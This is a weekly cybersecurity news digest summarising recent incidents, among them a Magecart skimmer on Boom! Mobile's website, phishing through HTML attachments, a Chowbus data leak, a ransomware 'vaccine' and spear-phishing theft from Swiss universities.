Cyber Weekly Digest - Week #41
Another interesting week for cyber security, including a new phishing technique and a ransomware 'vaccine'. Keep reading to find out about all the biggest stories in cyber security from around the world.
Mobile network operator Boom! Mobile's website became the victim of a Magecart campaign. On Monday, it was discovered that the firm's US website had been compromised and is actively being used to harvest shopper information. Magecart is a term to describe credit-card skimmer attacks and the cyber threat groups who use this method. Boom! Mobile has not yet responded to the attack, and shoppers are currently still at risk.
A new phishing scam was discovered earlier this week which is avoiding detection. Criminals are bypassing email security by using a fake website attached to the email itself as an HTML attachment. Typically, in a phishing campaign, the fake website would be reached by clicking a link. Researchers are urging people to avoid opening HTML attachments and be extra cautious of phishing emails during this time.
Just two months ago, the start-up company received $33 million in funding from investors to create an app to connect diners with Asian restaurants. The data breach will have significantly damaged the reputation to Chowbus due to the severity of the leak. Customers were sent a link to a file which contained 800,000 rows of data, with over 400,000 unique emails. It has been reported that due to the way the data was leaked, it was probably the result of a "disgruntled employee or ex-employee". Chowbus customers are being advised to change their account passwords and implement two-factor authentication immediately.
Released at the beginning of the week was a ransomware "vaccine" program. Typically ransomware infections delete shadow volume copies to prevent files from being recovered, shadow volume copy snapshots are where windows stores backups of your system and data files. The vaccine program works by terminating processes which try to delete shadow copies using Microsoft's vssadmin.exe program. Although this method can help prevent encryption from a large number of ransomware, some modern ransomware is still able to delete shadow volumes using other commands.
Three Swiss universities were targeted by threat actors who managed to drain employee salary transfers. The hackers started by carrying out spear-phishing attacks against the universities so that employees were tricked into providing their access data. The amount stolen is rumoured to be a six-figure amount and immediately moved the funds abroad. The umbrella organisation "Swissuniversities" sent a warning email to encourage universities to keep guard.